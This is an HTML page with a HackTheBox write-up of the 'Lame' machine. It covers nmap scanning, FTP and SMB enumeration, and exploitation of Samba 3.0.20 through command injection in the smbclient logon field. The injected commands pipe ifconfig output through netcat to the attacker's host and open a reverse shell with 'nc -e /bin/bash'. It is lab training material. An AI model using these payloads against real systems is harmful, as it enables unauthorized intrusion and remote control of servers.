<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HTB Writeup - Machine Name</title>
    <style>
        body {
           
           background-image: url(./capturashack/maths.jpg);
           background-repeat: no-repeat;
  background-size: cover;
  background-position: center;
  background-attachment: fixed;
            color: #fff;
            font-family: 'Segoe UI', sans-serif;
            padding: 20px;
            max-width: 900px;
            margin: auto;
            height: 100vh;
        }
        a {
            color: #4ea5ff;
        }
        h1, h2 {
            color: #ece6e6cb;
        }
        .code-block {
            background-color: #1e1e1e;
            padding: 10px;
            border-radius: 5px;
            margin: 10px 0;
            position: relative;
        }
        .code-block code {
            white-space: pre-wrap;
            display: block;
            padding: 5px;
        }
        .copy-btn {
            position: absolute;
            top: 10px;
            right: 10px;
            background-color: #444;
            color: #fff;
            border: none;
            padding: 5px 10px;
            cursor: pointer;
            border-radius: 3px;
        }
        .img-container img {
            max-width: 100%;
            border: 1px solid #333;
            margin: 10px 0;
            border-radius: 5px;
        }
    </style>
</head>
<body>

    <h1>HTB - Lame Writeup</h1>
    <p><a href="https://app.hackthebox.com/machines/Lame">Link to room on HackTheBox</a></p>

    <div class="img-container">
        <img src="Lame.png" alt="nmap output">
    </div>

    

    <h3>Scanning with nmap</h3>
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code>nmap -p- --open -sS --min-rate=5000 -n -Pn -vvv 10.10.10.3 -oG allports</code>
    </div>
    <div class="img-container">
        <img src="capturashack/scan1.png" alt="nmap output">
    </div>


    
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code> nmap -p21,22,139,445,3632 -sCV 10.10.10.3 -oN scan.txt </code>
    </div>
    <div class="img-container">
        <img src="capturashack/scan2.png" alt="nmap output">
    </div>

    

    <h3>trying ftp anonymous login, but we dont have permission for up files or execute commands, and no files found in this directory</h3>
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code> ftp 10.10.10.3 </code>
    </div>
   
    <div class="img-container">
        <img src="capturashack/ftpanon.png" alt="nmap output">
    </div>


    
    <h3> We can search exploits for ftp, smb or ssh versions </h3>
        <h3> With -m param we can copy the script in local dir </h3>
      
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code>searchsploit vsftpd 2.3.4</code>
 
        <code>searchsploit -m vsftpd 2.3.4</code>
    </div>

    <div class="img-container">
        <img src="capturashack/sploitftp.png" alt="nmap output">
    </div>
    
    <h3>We found a ftp exploit , we can inspect this python for manual exploit , we will try... but dont working</h3>
      
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code> nc 10.10.10.3 21 </code>
    </div>

    <div class="img-container">
        <img src="capturashack/tryftpsploit.png" alt="nmap output">
    </div>



    <h3>We found this smb exploit</h3>
      
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code>searchsploit Samba 3.0.20</code>
    </div>


    <div class="img-container">
        <img src="capturashack/smbsploit.png" alt="nmap output">
    </div>

    <h3>We can enum with smbclient</h3>
      
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code>smbclient -L 10.10.10.3 -N --option 'client min protocol = NT1' </code>
    </div>


    <div class="img-container">
        <img src="capturashack/smbenum.png" alt="nmap output">
    </div>

    <h3> Connect to tmp dir </h3>
      
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code>smbclient //10.10.10.3/tmp -N --option 'client min protocol = NT1' </code>
    </div>
   
    <div class="img-container">
        <img src="capturashack/connectsmb.png" alt="nmap output">
    </div>
    <h3> we execute a command on the remote computer using the samba logon command, as they do in the exploit we have found </h3>
      
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code>logon "/=`nohup ping -c 1 10.10.14.10`"</code>
    </div>
   
    <div class="img-container">
        <img src="capturashack/executecommand.png" alt="nmap output">
    </div>
    <h3>  try send a ifconfig </h3>
      
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code>logon "/=`nohup ifconfig | nc 10.10.14.10 443`"</code>
    </div>
   
    <div class="img-container">
        <img src="capturashack/testcommand.png" alt="nmap output">
    </div>
    <h3>We can send a shell to my parrot machine </h3>
      
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code>logon "/=`nohup nc -e /bin/bash 10.10.14.10 443`"</code>
    </div>
   
    <div class="img-container">
        <img src="capturashack/ifconfig.png" alt="nmap output">
    </div>
 
    <h3> Create a pseudoconsole and interactive console </h3>
      
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code>script /dev/null -c bash</code>
    </div>
    <h3> Pulse control + Z for suspend terminal , put stty command and reset xterm , next put stty size</h3>
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code> stty raw -echo; fg </code>
    </div>
   
    <div class="img-container">
        <img src="capturashack/seudoshell.png" alt="nmap output">
    </div>
   
    <h3> Finally find flags</h3>
    <div class="code-block">
        <button class="copy-btn" onclick="copyToClipboard(this)">Copy</button>
        <code> find / -name user.txt </code>
    </div>
   
    <div class="img-container">
        <img src="capturashack/flags.png" alt="nmap output">
    </div>
   


    <script>
        function copyToClipboard(btn) {
            const code = btn.nextElementSibling.innerText;
            navigator.clipboard.writeText(code).then(() => {
                btn.innerText = "Copied!";
                setTimeout(() => { btn.innerText = "Copy"; }, 1500);
            });
        }
    </script>
</body>
</html>
